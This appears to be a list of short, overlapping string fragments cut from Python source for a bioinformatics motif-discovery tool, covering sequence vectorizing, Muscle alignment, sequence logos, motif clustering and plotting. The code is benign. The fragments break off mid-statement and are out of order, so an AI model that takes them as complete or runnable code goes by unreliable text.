"== abs(c_i - c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx =",
"1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for",
"del motives[j] success = True if success is False: break # TODO: run",
"* len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i",
"< 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >=",
"def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt, pcov =",
"p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time = time.time() -",
"= MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs =",
"a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the empirical cumulative",
"figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname",
"!= %d' % (len(sig), median_len)) if sigs is None: if len(sig) >= median_len:",
"chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time = time.time()",
"sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq)",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self,",
"tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin),",
"min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size)",
"= IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna",
"logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars = error_bars",
"if motives: if ids is None: ids = [cluster_id for cluster_id in motives]",
"= self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No",
"e) logger.debug('Exception', exc_info=True) def _order_clusters(self, clusters, complexity=3): sep = ' ' * (complexity",
"for c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i",
"Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = []",
"len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\"",
"'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img",
"d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs)",
"line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq #",
"pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as",
"j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq']",
"p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\"",
"y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) #",
"in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def",
"is now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 + info2)",
"classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except Exception",
"yield score except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception',",
"i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code = ''",
"== 0: code_str = None elif len(code) == 1: code_str = code[0] else:",
"motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info",
"regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False,",
"mp import os from collections import defaultdict from eden import apply_async import numpy",
"%.2f secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p,",
"/ 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70)",
"pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in",
"== -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool,",
"options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint =",
"= 'auto', scale_stack_widths=True, error_bars=True, title='', figure_label='', show_x_axis=True, x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, #",
"= np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def",
"= header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end = int(end) subseq",
"else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else:",
"min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size:",
"min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs =",
"orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05):",
"iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items",
"input sequences.\"\"\" # seperate headers headers, instances = [list(x) for x in zip(*seqs)]",
"> min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq,",
"d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time,",
"logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items",
"/ float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = []",
"instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours = maxhours if alphabet ==",
"regex as re from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh",
"yield seq seq = \"\" line_str = str(line) yield line_str.strip() else: line_str =",
"if title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis",
"p_value.') logger.debug('Working on: %d fragments' % len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences)",
"logger.debug('Annotating') start_time = time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time",
"% (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' -",
"motif del motives[j] success = True if success is False: break # TODO:",
"= time.time() scores = p.get() scores_items += scores d_time = time.time() - start_time",
"options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if",
"[-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred =",
"(time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p",
"1 if i != j: # find closest instance j from any instance",
"= [list(x) for x in zip(*seqs)] instances_seqrecord = [] for i, j in",
"self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self",
"normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname =",
"= [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary:",
"')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq",
"d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None,",
"multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs",
"= scale_stack_widths options.show_errorbars = error_bars if title: options.title = title if figure_label: options.logo_label",
"= time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() - start_time",
"= time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)'",
"subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None,",
"xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores) popt,",
"logos[cluster_id] = (logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute. Try",
"-4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs =",
"haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) /",
"= SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format ==",
"from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import",
"n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix,",
"logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info =",
"plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g')",
"return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items",
"fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size,",
"computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i",
"pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line",
"[] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs = [s for",
"y = sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() code = '' for i, row",
"title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label =",
"\"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex,",
"Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if",
"\"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None):",
"float(score) loc = header.split('<loc>')[1] begin, end = loc.split(':') begin = int(begin) end =",
"for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score",
"std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size,",
"* 100) else: logger.warning( 'No motives to report. Try more permissive parameters.') txt",
"components p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p,",
"cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx): norm = row[i] if",
"options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval =",
"trimmed_align_seqs = [] for h, align_seq in align_seqs: trimmed_align_seq = [a for i,",
"dict() for cluster_id in clusters: start_time = time.time() # align with muscle is_high_quality,",
"for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters))",
"else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values' % (len(scores)))",
"sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d != %d' %",
"= 'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme)",
"motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num co-occurences %d %s",
"values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params: a:%.2f b:%.2f' %",
"std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts,",
"logger.debug('After quality filter, %d motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05,",
"end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov =",
"find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s, overlapped=True)",
"import weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as re from",
"of occurrences of regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st =",
"in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info = ' - %.2s",
"# update motives motives[i] = motif del motives[j] success = True if success",
"= np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\"",
"estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration.",
"selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy()",
"subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end)",
"= [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix",
"end, width)) for h, s in seqs: if s[start:end]: yield (h, s[start:end]) def",
"%d [%d is now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1",
"regex_th=regex_th) if l: code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for",
"in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq,",
"sep = ' ' * (complexity * 2) # join all sequences in",
"cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id, j)] info = ' - num",
"figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len",
"= '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None",
"= 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys",
"figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j",
"%.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname =",
"= [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle =",
"min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th,",
"def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp",
"% len(self.clusters)) return self.clusters except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if",
"error_bars if title: options.title = title if figure_label: options.logo_label = figure_label options.show_xaxis =",
"estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time = time.time()",
"compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error:",
"def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1:",
"p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs,",
"score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs,",
"predictor to learn the new class definition logger.debug('After merge, %d motives' % len(motives))",
"(i, n_i, j, n_j, rel_nw_score) info2 = ' deleting: %d [%d is now",
"logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join()",
"options.fineprint = fineprint self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create",
"None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs']",
"if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle",
"time.time() if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results",
">= min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq in align_seqs:",
"sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score,",
"subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq",
"d_ij = [] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i -",
"ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return logos",
"'%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname =",
"val = k[1][1] else: val = k[0][1] if float(val) / dim >= min_freq:",
"c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score =",
"= np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in enumerate(cooccurence_mtx):",
"size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta: %.2f)' % (i, size, d_time,",
"# confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification",
"import regex as re from collections import Counter from sklearn import metrics from",
"seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score",
"end = ids[i + 1] width = end - start val = sum(sig[start:end])",
"return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if",
"* neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix)",
"figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack:",
"%s' % e) logger.debug('Exception', exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4,",
"bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num",
"vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs, neg_seqs,",
"= self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A",
"for cluster_id in clusters: start_time = time.time() # align with muscle is_high_quality, motif",
"SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data): params",
"logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items",
"(co) txt.append(info) info = ' - freq of occurrences of regex: %.2f' %",
"yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs",
"enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if",
"smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3,",
"end - start val = sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs,",
"motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None):",
"k = c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim",
"(j, i, n_i + n_j) logger.debug(info1 + info2) # update motives motives[i] =",
"hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for id",
"sequence logo for input sequences.\"\"\" # seperate headers headers, instances = [list(x) for",
"half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield",
"= subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score = subarray['score'] header =",
"= np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0 to_be_removed = []",
"pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs",
"dtime = time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters =",
"min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motives.\"\"\" if not clusters: raise Exception('Error: No clusters.') mcs",
"i d_ij = [] for c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i",
"\"\"\"multiprocess_performance.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"= iter(iterable) while True: items = [] for i in range(n): it =",
"(complexity * 2) # join all sequences in a cluster with enough space",
"start_time = time.time() preds = [] binary_preds = [] true_targets = [] for",
"freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme",
"for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size",
"alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return",
"'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours =",
"f: f.write(logo) return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url",
"== 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"'",
"for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord,",
"i in ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id =",
"multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool",
"* nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i,",
"cluster_id in clusters: start_time = time.time() # align with muscle is_high_quality, motif =",
"edit_distance import random import pylab as plt import joblib from scipy.optimize import curve_fit",
"1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code =",
"_wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd + '/' +",
"logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit:",
"seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq",
"is too strict. Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives'",
"ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins, normed=0,",
"median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig",
"+ sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7):",
"[] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable:",
"def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for",
"\"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for match in re.finditer(needle,",
"def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row",
"regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] =",
"'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return False, None def compute_motives(self,",
"= pwd + '/' + fname txt = [] if fill_width: if output_type",
"plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i)",
"show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint: options.fineprint = fineprint self.options",
"self.output_format == 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class",
"Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in",
"options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label:",
"not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return",
"StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data):",
"from eden.sequence import Vectorizer from StringIO import StringIO from Bio import SeqIO from",
"header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration. Reason:",
"size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches =",
"orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items =",
"logger.debug('After motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8):",
"'rna' color_scheme = 'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image",
"true_targets def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items",
"maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet",
"else: figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None):",
